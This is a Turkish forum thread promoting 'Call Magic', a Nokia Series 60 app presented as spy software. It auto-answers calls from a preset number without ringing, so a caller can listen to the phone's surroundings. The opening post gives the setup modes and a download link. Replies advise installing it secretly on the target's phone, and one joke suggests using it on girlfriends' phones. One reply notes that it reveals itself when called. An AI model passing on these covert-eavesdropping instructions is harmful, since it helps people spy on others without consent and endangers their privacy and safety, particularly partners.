Casus Cep Telefonu Dinleme Yazılımı !!!
-
Call Magic : Telefona gelen çağrıları otomatik olarak kabul eder.telefonda zil çalmaz.herhangi bir uyarı olmaz.aranan telefona önceden tanımlanmış olan numaradan aradığınızda karsı taraf farketmeden ortamı dinlemeye başlarsınız.
Program yuklenince 3 adet cevaplama modundan birinin seçilmesi istenir.
1-reject all
2-hands-free
3-answer one
Answer one modunda casus telefonu arayacağınız telefonun numarasını tanımlayıp otomatik açılmanın zil çalmadan veya kaç zilden sonra açılacağını tanımlarsınız.
Hands free modunda zil sayısını arttırıp araç tel olarak da kullanılabilir.
Reject All Modunda tüm çağrılar red edilir ve meşgul sinyali verilir.
Nokia Series 60v2 :: Nokia 3230, 6260, 6600, 6620, 6630, 6670, 6680, 6681, 7610, N70 -
discoteam_487 bunu yazdı:
-----------------------------Call Magic : Telefona gelen çağrıları otomatik olarak kabul eder.telefonda zil çalmaz.herhangi bir uyarı olmaz.aranan telefona önceden tanımlanmış olan numaradan aradığınızda karsı taraf farketmeden ortamı dinlemeye başlarsınız.
Program yuklenince 3 adet cevaplama modundan birinin seçilmesi istenir.
1-reject all
2-hands-free
3-answer one
Answer one modunda casus telefonu arayacağınız telefonun numarasını tanımlayıp otomatik açılmanın zil çalmadan veya kaç zilden sonra açılacağını tanımlarsınız.
Hands free modunda zil sayısını arttırıp araç tel olarak da kullanılabilir.
Reject All Modunda tüm çağrılar red edilir ve meşgul sinyali verilir.
Nokia Series 60v2 :: Nokia 3230, 6260, 6600, 6620, 6630, 6670, 6680, 6681, 7610, N70http://download6.getjar.com/downloads/web/pub/1991/CallMagic_2_0.sis
-
İndiriyorz Bakalım Saol Deneyelim ...
-
nereye kaydediyo başka bi yere mi geliyo yoksa telefonun hafızasına mı
-
Deneyen yazsın.
-
bayzin bunu yazdı:
-----------------------------
Deneyen yazsın.
-----------------------------
Niye bizim telefonları kobay yerine koyuyorsun :)
-
katdetme olayını bilmiyorum.ama ben denedim bende çalışıyor.dinleme yapacagınız telefona caktırmadan yüklemeniz yeterli olacaktır.:)
ve gereken ayarları yaptıktan sonra işlem tamamdır.onu aradıgınız zaman telefonu calmadan hiç bir tepki vermeden acılacaktır artık.
-
arkadaslar dinleme programi falan degil bu yaw, ben denemistim onceden, dinlemek istediginiz kisinin telefonuna bu programi yükleyip kendi cep telefonu numaranizi tanimliyorsunuz ve answer one i isaretliyorsunuz..
siz dinlemek istediginiz kisiyi aradiginizda program telefonu otomatik aciyor siz de dinlemis oluyorsunuz ama bos, arama yaptiginizda program kendini cok basit ele veriyor, isigi yaniyor, zil cok kisa süre olsada caliyor..
-
bunun full olanı elinde olan var mı?
bayadır bakınıyorum ve bulamadım :| (OS7)
-
karşıdaki kişinin telefon modeli önemli yoksa sadece bizim telefonun ki o proramı desteklemesi lazım
-
ooooo bunu manitaların telefona kurarsam yaşarım ,şenlik büyük olur yaw.
önce indirek.